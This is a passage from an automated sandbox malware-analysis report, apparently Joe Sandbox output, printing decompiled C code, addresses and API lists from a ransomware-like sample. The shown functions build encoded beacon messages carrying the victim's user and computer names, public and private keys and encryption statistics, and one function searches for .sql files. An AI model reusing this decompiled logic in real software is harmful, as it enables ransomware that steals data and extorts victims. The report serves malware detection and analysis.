					MultiByteToWideChar(0xfde9, 0, _t283, 0xffffffff, _v496, lstrlenA(_t283));
					_v508 = 0;
					_t189 = E0F9D54A0(_t283,  &_v508, 1);
					if(_t189 != 0) {
						_t240 = _v508;
						if(_t240 != 0) {
							 *_a12 = _t240;
						}
						VirtualFree(_v504, 0, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						L53:
						_t268 = 1;
					} else {
						VirtualFree(_v504, _t189, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						_t268 = 0;
					}
				}
				VirtualFree(_v428, 0, 0x8000);
				E0F9D7C10( &_v408);
				return _t268;
			}



















































































                                        0x0f9d588f
                                        0x0f9d5890
                                        0x0f9d5892
                                        0x0f9d5893
                                        0x0f9d5898
                                        0x0f9d589e
                                        0x0f9d58a2
                                        0x0f9d58a4
                                        0x0f9d58a5
                                        0x0f9d58a7
                                        0x0f9d58a8
                                        0x0f9d58aa
                                        0x0f9d58ab
                                        0x0f9d58ad
                                        0x0f9d58ae
                                        0x0f9d58b3
                                        0x0f9d58b5
                                        0x0f9d58b6
                                        0x0f9d58bf
                                        0x0f9d58c8
                                        0x0f9d58d9
                                        0x0f9d58db
                                        0x0f9d58e4
                                        0x0f9d58ea
                                        0x0f9d58f0
                                        0x0f9d58f6
                                        0x0f9d58f8
                                        0x0f9d58fc
                                        0x0f9d5903
                                        0x0f9d590c
                                        0x0f9d5921
                                        0x0f9d5925
                                        0x0f9d5912
                                        0x0f9d5912
                                        0x0f9d5915
                                        0x0f9d5919
                                        0x0f9d591d
                                        0x0f9d591d
                                        0x0f9d592f
                                        0x0f9d5936
                                        0x0f9d594f
                                        0x0f9d594f
                                        0x0f9d5951
                                        0x0f9d5938
                                        0x0f9d5938
                                        0x0f9d593d
                                        0x00000000
                                        0x0f9d593f
                                        0x0f9d593f
                                        0x0f9d5941
                                        0x0f9d5945
                                        0x0f9d5947
                                        0x0f9d5949
                                        0x0f9d5949
                                        0x0f9d593d
                                        0x0f9d595a
                                        0x0f9d595e
                                        0x0f9d596d
                                        0x0f9d596f
                                        0x0f9d596f
                                        0x0f9d5975
                                        0x00000000
                                        0x0f9d597b
                                        0x0f9d597b
                                        0x0f9d5987
                                        0x0f9d599a
                                        0x0f9d599f
                                        0x0f9d59b3
                                        0x0f9d59bc
                                        0x0f9d59d0
                                        0x0f9d59d5
                                        0x0f9d59df
                                        0x0f9d59e3
                                        0x0f9d59e7
                                        0x0f9d59ef
                                        0x0f9d59f1
                                        0x0f9d59f5
                                        0x0f9d59f8
                                        0x0f9d5a0f
                                        0x0f9d59fe
                                        0x0f9d5a01
                                        0x0f9d5a05
                                        0x0f9d5a09
                                        0x0f9d5a09
                                        0x0f9d5a1a
                                        0x0f9d5a20
                                        0x0f9d5a2a
                                        0x0f9d5a2a
                                        0x0f9d5a36
                                        0x0f9d5a3c
                                        0x0f9d5a3e
                                        0x0f9d5a42
                                        0x0f9d5a46
                                        0x0f9d5a50
                                        0x0f9d5a50
                                        0x0f9d5a55
                                        0x0f9d5a5b
                                        0x0f9d5a5e
                                        0x0f9d5a5e
                                        0x0f9d5a63
                                        0x0f9d5a64
                                        0x0f9d5a66
                                        0x0f9d5a6a
                                        0x0f9d5a6e
                                        0x0f9d5a6e
                                        0x0f9d5a73
                                        0x0f9d5a79
                                        0x0f9d5a7b
                                        0x0f9d5a7f
                                        0x0f9d5a83
                                        0x0f9d5a83
                                        0x0f9d5a88
                                        0x0f9d5a8e
                                        0x0f9d5a91
                                        0x0f9d5a91
                                        0x0f9d5a96
                                        0x0f9d5a97
                                        0x0f9d5a99
                                        0x0f9d5a9d
                                        0x0f9d5a83
                                        0x0f9d5aa1
                                        0x0f9d5ab1
                                        0x0f9d5ac0
                                        0x0f9d5ac4
                                        0x0f9d5acf
                                        0x0f9d5ad2
                                        0x0f9d5af0
                                        0x0f9d5afc
                                        0x0f9d5aff
                                        0x0f9d5b21
                                        0x0f9d5b2d
                                        0x0f9d5b47
                                        0x0f9d5b57
                                        0x0f9d5b59
                                        0x0f9d5b5f
                                        0x0f9d5b68
                                        0x0f9d5b76
                                        0x0f9d5b6e
                                        0x0f9d5b6e
                                        0x0f9d5b6e
                                        0x0f9d5b7e
                                        0x0f9d5b80
                                        0x0f9d5b86
                                        0x0f9d5b88
                                        0x0f9d5b97
                                        0x0f9d5b9b
                                        0x0f9d5ba7
                                        0x0f9d5bac
                                        0x0f9d5bb5
                                        0x0f9d5bbb
                                        0x0f9d5bbf
                                        0x0f9d5bc7
                                        0x0f9d5be8
                                        0x0f9d5bf1
                                        0x0f9d5bff
                                        0x0f9d5c0e
                                        0x0f9d5c12
                                        0x0f9d5c2e
                                        0x0f9d5c30
                                        0x0f9d5c30
                                        0x0f9d5c40
                                        0x0f9d5c40
                                        0x0f9d5c4d
                                        0x0f9d5c53
                                        0x0f9d5c53
                                        0x0f9d5c56
                                        0x0f9d5c5c
                                        0x0f9d5c66
                                        0x0f9d5c66
                                        0x0f9d5c5e
                                        0x0f9d5c5e
                                        0x0f9d5c64
                                        0x00000000
                                        0x00000000
                                        0x0f9d5c64
                                        0x0f9d5c6f
                                        0x0f9d5c75
                                        0x0f9d5c77
                                        0x0f9d5c7b
                                        0x0f9d5c80
                                        0x0f9d5c80
                                        0x0f9d5c85
                                        0x0f9d5c8b
                                        0x0f9d5c8e
                                        0x0f9d5c8e
                                        0x0f9d5c93
                                        0x0f9d5c94
                                        0x0f9d5c96
                                        0x0f9d5c9a
                                        0x0f9d5c80
                                        0x0f9d5c9e
                                        0x0f9d5cb4
                                        0x0f9d5cc0
                                        0x0f9d5cca
                                        0x0f9d5cd4
                                        0x0f9d5d07
                                        0x0f9d5d0d
                                        0x0f9d5d12
                                        0x0f9d5d12
                                        0x0f9d5d26
                                        0x0f9d5d33
                                        0x0f9d5d40
                                        0x0f9d5d4a
                                        0x0f9d5d4a
                                        0x0f9d5cd6
                                        0x0f9d5ce7
                                        0x0f9d5cf4
                                        0x0f9d5d01
                                        0x0f9d5d03
                                        0x0f9d5d03
                                        0x0f9d5cd4
                                        0x0f9d5d5a
                                        0x0f9d5d60
                                        0x0f9d5d6d

                                        APIs
                                          • Part of subcall function 0F9D39F0: GetProcessHeap.KERNEL32(?,?,0F9D4637,00000000,?,00000000,00000000), ref: 0F9D3A8C
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F9D7357
                                          • Part of subcall function 0F9D7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0F9D7368
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F9D7386
                                          • Part of subcall function 0F9D7330: GetComputerNameW.KERNEL32 ref: 0F9D7390
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F9D73B0
                                          • Part of subcall function 0F9D7330: wsprintfW.USER32 ref: 0F9D73F1
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F9D740E
                                          • Part of subcall function 0F9D7330: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F9D7432
                                          • Part of subcall function 0F9D7330: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0F9D4640,?), ref: 0F9D7456
                                          • Part of subcall function 0F9D7330: RegCloseKey.ADVAPI32(00000000), ref: 0F9D7472
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7192
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D719D
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71B3
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71BE
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71D4
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71DF
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71F5
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(0F9D4966,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7200
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7216
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7221
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7237
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7242
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7261
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D726C
                                        • VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0F9D58F0
                                        • CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0F9D599A
                                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0F9D59B3
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D59BC
                                        • lstrlenA.KERNEL32(?), ref: 0F9D59C4
                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0F9D59D5
                                        • lstrlenA.KERNEL32(?), ref: 0F9D59EF
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5A18
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5A38
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5A64
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5A75
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5A97
                                        • lstrcatW.KERNEL32(?,action=call&), ref: 0F9D5AB1
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5ABA
                                        • lstrcatW.KERNEL32(?,&pub_key=), ref: 0F9D5ACF
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5AD2
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5ADB
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,74CB69A0,00000000), ref: 0F9D5AF0
                                        • lstrcatW.KERNEL32(?,&priv_key=), ref: 0F9D5AFC
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5AFF
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5B0C
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,74CB69A0,00000000), ref: 0F9D5B21
                                        • lstrcatW.KERNEL32(?,&version=2.3r), ref: 0F9D5B2D
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5B39
                                        • VirtualAlloc.KERNEL32(00000000,-00000012,00003000,00000040), ref: 0F9D5B4D
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5B5D
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5B7E
                                        • _memset.LIBCMT ref: 0F9D5BC7
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5BDA
                                          • Part of subcall function 0F9D5D70: _memset.LIBCMT ref: 0F9D5D9D
                                        • CryptBinaryToStringA.CRYPT32(?,-00000012,40000001,?,?), ref: 0F9D5C26
                                        • GetLastError.KERNEL32 ref: 0F9D5C30
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5C37
                                        • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 0F9D5C46
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5C51
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5C71
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5C94
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5CA3
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000000), ref: 0F9D5CB4
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5CE7
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5CF4
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D01
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D26
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D33
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D40
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Virtual$Alloc$Free$lstrcat$BinaryByteCharCryptMultiStringWide$Name_memset$CloseComputerErrorHeapLastOpenProcessQueryUserValuewsprintf
                                        • String ID: #shasj$&priv_key=$&pub_key=$&version=2.3r$action=call&
                                        • API String ID: 2781787645-472827701
                                        • Opcode ID: 255cd6b7fce2ff359efd85a661351dd3fbec36fc6ca318337ea6fb5f227a63c6
                                        • Instruction ID: 0e4f7796f0be8b74af80200d39dc9013b07669d75eeaa73f59306592892bc88a
                                        • Opcode Fuzzy Hash: 255cd6b7fce2ff359efd85a661351dd3fbec36fc6ca318337ea6fb5f227a63c6
                                        • Instruction Fuzzy Hash: 6DE1EE71108302AFE720DF24CC84B6BBBE9EF88754F24891CF585A7291D774E915CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6A40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136stringfilememoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D6A40(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0F9D8100(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E0F9D69E0(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}



















                                        0x0f9d6a4b
                                        0x0f9d6a4f
                                        0x0f9d6a5e
                                        0x0f9d6a61
                                        0x0f9d6a64
                                        0x0f9d6a7e
                                        0x0f9d6a83
                                        0x0f9d6a86
                                        0x0f9d6a90
                                        0x0f9d6aa0
                                        0x00000000
                                        0x0f9d6abc
                                        0x0f9d6ac4
                                        0x0f9d6acb
                                        0x0f9d6ad1
                                        0x0f9d6ad4
                                        0x0f9d6ad9
                                        0x0f9d6ba8
                                        0x0f9d6ba8
                                        0x00000000
                                        0x0f9d6ae0
                                        0x0f9d6ae0
                                        0x0f9d6ae6
                                        0x0f9d6ae9
                                        0x0f9d6aea
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d6aea
                                        0x0f9d6aee
                                        0x00000000
                                        0x0f9d6af4
                                        0x0f9d6afa
                                        0x0f9d6afe
                                        0x00000000
                                        0x0f9d6b04
                                        0x0f9d6b17
                                        0x0f9d6b22
                                        0x0f9d6b26
                                        0x0f9d6b2f
                                        0x0f9d6b40
                                        0x0f9d6b44
                                        0x0f9d6b57
                                        0x0f9d6b6e
                                        0x0f9d6b74
                                        0x0f9d6b7e
                                        0x0f9d6b7e
                                        0x0f9d6b89
                                        0x0f9d6b89
                                        0x0f9d6b8f
                                        0x0f9d6b8f
                                        0x0f9d6b93
                                        0x0f9d6b99
                                        0x0f9d6b9e
                                        0x0f9d6baa
                                        0x0f9d6baf
                                        0x00000000
                                        0x0f9d6baf
                                        0x0f9d6b9e
                                        0x0f9d6afe
                                        0x0f9d6aee
                                        0x0f9d6ad9
                                        0x00000000
                                        0x0f9d6bb2
                                        0x0f9d6bc2
                                        0x0f9d6bcd
                                        0x0f9d6bdb

                                        APIs
                                        • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6A52
                                        • lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6A64
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6A72
                                        • lstrcmpW.KERNEL32(?,0F9DFEC8,?,?), ref: 0F9D6A9C
                                        • lstrcmpW.KERNEL32(?,0F9DFECC,?,?), ref: 0F9D6AB2
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0F9D6AC4
                                        • lstrlenW.KERNEL32(00000000,?,?), ref: 0F9D6ACB
                                        • lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F9D6AFA
                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F9D6B11
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F9D6B1C
                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F9D6B3A
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F9D6B4F
                                        • lstrlenA.KERNEL32(*******************,?,?), ref: 0F9D6B6E
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F9D6B89
                                        • CloseHandle.KERNEL32(00000000,?,?), ref: 0F9D6B93
                                        • FindNextFileW.KERNEL32(?,?,?,?), ref: 0F9D6BBC
                                        • FindClose.KERNEL32(?,?,?), ref: 0F9D6BCD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
                                        • String ID: *******************$.sql
                                        • API String ID: 3616287438-58436570
                                        • Opcode ID: 7acef97b6cf5bf908ecdaaa8ee129a3ebd2e9f96ac06adc6bed569c35bb26690
                                        • Instruction ID: db7127e1794116e3484887351a720f12dd837b5ffa9690e8d09b30950e54e4e8
                                        • Opcode Fuzzy Hash: 7acef97b6cf5bf908ecdaaa8ee129a3ebd2e9f96ac06adc6bed569c35bb26690
                                        • Instruction Fuzzy Hash: 4441A671606216ABEB209F64CC49FAE77ACEF45715F608055F502E3182DB78AA50CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D5670 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 169stringmemoryencryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 51%
                                        			E0F9D5670(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				BYTE* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				char _v22;
				short _v24;
				short _v28;
				char _v36;
				char _v180;
				char _v435;
				char _v436;
				WCHAR* _t40;
				signed int _t48;
				int _t60;
				void* _t61;
				char _t68;
				CHAR* _t71;
				void* _t74;
				short _t79;
				short _t80;
				char _t81;
				BYTE* _t84;
				WCHAR* _t92;
				signed int _t93;
				char* _t95;
				void* _t96;
				int _t98;
				long _t99;
				void* _t100;

				_t88 = __edx;
				_t74 = __ecx;
				_t96 = __edx;
				_v12 = __ecx;
				_t40 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v16 = _t40;
				if(_t40 == 0) {
					_t92 = 0;
					_t71 = 0;
				} else {
					_t3 =  &(_t40[0x400]); // 0x800
					_t71 = _t3;
					_t92 = _t40;
				}
				_push(_t96);
				_v8 = _t92;
				wsprintfW(_t92, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v12, _a4, _a8);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				E0F9D39F0( &_v180);
				E0F9D7330( &_v180, _t88);
				E0F9D7140( &_v180);
				E0F9D6F40( &_v180,  &(_t92[lstrlenW(_t92)]));
				_t48 = lstrlenW(_t92);
				_t79 = "#shasj"; // 0x61687323
				_t93 = _t48;
				asm("movq xmm0, [0xf9dfc78]");
				_v28 = _t79;
				_t80 =  *0xf9dfc84; // 0x6a73
				_v24 = _t80;
				_t81 =  *0xf9dfc86; // 0x0
				asm("movq [ebp-0x20], xmm0");
				_v22 = _t81;
				_v436 = 0;
				E0F9D9010( &_v435, 0, 0xff);
				E0F9D5D70( &_v436,  &_v36, lstrlenA( &_v36));
				_t98 = _t93 + _t93;
				E0F9D5E20( &_v436, _v8, _t98);
				_v20 = _t93 * 8;
				if(CryptBinaryToStringA(_v8, _t98, 0x40000001, _t71,  &_v20) == 0) {
					GetLastError();
				}
				_t29 = lstrlenA(_t71) + 4; // 0x4
				_t99 = _t29;
				_v12 = VirtualAlloc(0, _t99, 0x3000, 0x40);
				_t60 = lstrlenA(_t71);
				_t84 = _v12;
				_t61 = _t60 + 2;
				if(_t84 == 0) {
					L7:
					_v8 = 0;
				} else {
					_v8 = _t84;
					if(_t61 >= _t99) {
						goto L7;
					}
				}
				_t100 = 0;
				if(lstrlenA(_t71) != 0) {
					_t95 = _v8;
					do {
						_t68 =  *((intOrPtr*)(_t100 + _t71));
						if(_t68 != 0xa && _t68 != 0xd) {
							 *_t95 = _t68;
							_t95 = _t95 + 1;
						}
						_t100 = _t100 + 1;
					} while (_t100 < lstrlenA(_t71));
				}
				E0F9D54A0(_v8, 0, 0);
				_t73 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E0F9D7C10( &_v180);
				VirtualFree(_v16, 0, 0x8000);
				_t67 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}
































                                        0x0f9d5670
                                        0x0f9d5670
                                        0x0f9d568a
                                        0x0f9d568c
                                        0x0f9d568f
                                        0x0f9d5695
                                        0x0f9d569a
                                        0x0f9d56a6
                                        0x0f9d56a8
                                        0x0f9d569c
                                        0x0f9d569c
                                        0x0f9d569c
                                        0x0f9d56a2
                                        0x0f9d56a2
                                        0x0f9d56aa
                                        0x0f9d56ae
                                        0x0f9d56bd
                                        0x0f9d56c6
                                        0x0f9d56c8
                                        0x0f9d56c9
                                        0x0f9d56ce
                                        0x0f9d56d0
                                        0x0f9d56d1
                                        0x0f9d56d3
                                        0x0f9d56d4
                                        0x0f9d56d6
                                        0x0f9d56d7
                                        0x0f9d56d9
                                        0x0f9d56da
                                        0x0f9d56df
                                        0x0f9d56e1
                                        0x0f9d56e2
                                        0x0f9d56ea
                                        0x0f9d56f5
                                        0x0f9d5700
                                        0x0f9d5718
                                        0x0f9d571e
                                        0x0f9d5720
                                        0x0f9d5726
                                        0x0f9d5728
                                        0x0f9d5736
                                        0x0f9d5739
                                        0x0f9d5745
                                        0x0f9d5749
                                        0x0f9d5752
                                        0x0f9d5757
                                        0x0f9d575a
                                        0x0f9d5761
                                        0x0f9d577d
                                        0x0f9d5785
                                        0x0f9d5792
                                        0x0f9d57a1
                                        0x0f9d57ba
                                        0x0f9d57bc
                                        0x0f9d57bc
                                        0x0f9d57d2
                                        0x0f9d57d2
                                        0x0f9d57df
                                        0x0f9d57e2
                                        0x0f9d57e4
                                        0x0f9d57e7
                                        0x0f9d57ec
                                        0x0f9d57f5
                                        0x0f9d57f5
                                        0x0f9d57ee
                                        0x0f9d57ee
                                        0x0f9d57f3
                                        0x00000000
                                        0x00000000
                                        0x0f9d57f3
                                        0x0f9d57fd
                                        0x0f9d5803
                                        0x0f9d5805
                                        0x0f9d5808
                                        0x0f9d5808
                                        0x0f9d580d
                                        0x0f9d5813
                                        0x0f9d5815
                                        0x0f9d5815
                                        0x0f9d5817
                                        0x0f9d581e
                                        0x0f9d5808
                                        0x0f9d5829
                                        0x0f9d5843
                                        0x0f9d5850
                                        0x0f9d5858
                                        0x0f9d5867
                                        0x0f9d586b
                                        0x0f9d5871

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0F9D568F
                                        • wsprintfW.USER32 ref: 0F9D56BD
                                        • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F9D570C
                                        • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F9D571E
                                        • _memset.LIBCMT ref: 0F9D5761
                                        • lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0F9D576D
                                        • CryptBinaryToStringA.CRYPT32(?,74CB69A0,40000001,00000000,00000000), ref: 0F9D57B2
                                        • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57BC
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57C9
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57D8
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57E2
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57FF
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D5818
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D5850
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D5867
                                        Strings
                                        • #shasj, xrefs: 0F9D5720
                                        • action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 0F9D56B7
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
